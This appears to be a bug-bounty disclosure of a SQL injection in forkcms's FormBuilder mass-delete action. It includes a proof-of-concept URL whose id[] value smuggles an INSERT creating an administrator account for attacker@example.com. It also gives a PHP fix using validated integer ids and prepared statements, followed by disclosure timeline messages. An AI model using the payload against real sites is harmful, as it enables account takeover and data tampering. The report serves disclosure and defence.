SQL Injection in forkcms/forkcms
Valid
Reported on Oct 30th 2021
Description
When deleting submissions that belong to a form (made with the FormBuilder module), the parameter id[] is vulnerable to SQL injection.
Proof of Concept
- Call the URL
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
- To test this URL successfully, you need a valid form and some submissions to that form. You might have to adjust the parameter form_id to another value.
- After calling this URL, you have a new entry in the users table.
Impact
The attacker can tamper with data in the database at will.
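The root cause described above is a list of ids being pasted into a DELETE statement as SQL text. The following PHP is an added example (not forkcms's own code) of how a mass-delete handler can treat id[] as data instead: each entry is checked to be a canonical positive integer, and the query uses one placeholder per id. The table and column names (form_data, form_id, id) and the $db connection are assumptions.

```php
<?php
// Added example, not forkcms code: a mass-delete handler that treats id[] as data, not SQL.
// Table and column names (form_data, form_id, id) and the $db connection are assumptions.

declare(strict_types=1);

/**
 * Accept only canonical positive integers from id[]. A value such as
 * "3);insert into users(...);--" fails the pattern and is rejected outright.
 */
function parseSubmissionIds(array $rawIds): array
{
    $ids = [];
    foreach ($rawIds as $value) {
        if (!is_string($value) && !is_int($value)) {
            throw new InvalidArgumentException('id[] entries must be scalar');
        }
        if (preg_match('/^[1-9][0-9]{0,17}$/', (string) $value) !== 1) {
            throw new InvalidArgumentException('id[] entries must be positive integers');
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

/**
 * Delete submissions with a prepared statement. The vulnerable pattern this replaces
 * is string concatenation such as "... WHERE id IN (" . implode(',', $_GET['id']) . ")".
 * The CSRF token check mentioned by the maintainers is a separate control and does not
 * remove the need to parameterise the query.
 */
function deleteSubmissions(PDO $db, int $formId, array $rawIds): int
{
    $ids = parseSubmissionIds($rawIds);
    if ($ids === []) {
        return 0;
    }
    // One "?" per id, so the ids travel as bound parameters, never as SQL text.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare(
        "DELETE FROM form_data WHERE form_id = ? AND id IN ($placeholders)"
    );
    $stmt->execute(array_merge([$formId], $ids));
    return $stmt->rowCount();
}

// Usage (assumed request shape):
// $deleted = deleteSubmissions($db, (int) $_GET['form_id'], $_GET['id'] ?? []);
```

Scoping the DELETE to form_id also stops one form's mass-delete action from removing submissions that belong to another form.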
We have contacted a member of the forkcms team and are waiting to hear back
7 months ago
We have sent a follow up to the forkcms team. We will try again in 7 days.
7 months ago
We have sent a second follow up to the forkcms team. We will try again in 10 days.
6 months ago
We have sent a third and final follow up to the forkcms team. This report is now considered stale.
6 months ago
csrf token fails and blocks this
The disclosure bounty has been dropped
The fix bounty has been dropped
Jelmer Prins
has been awarded the fix bounty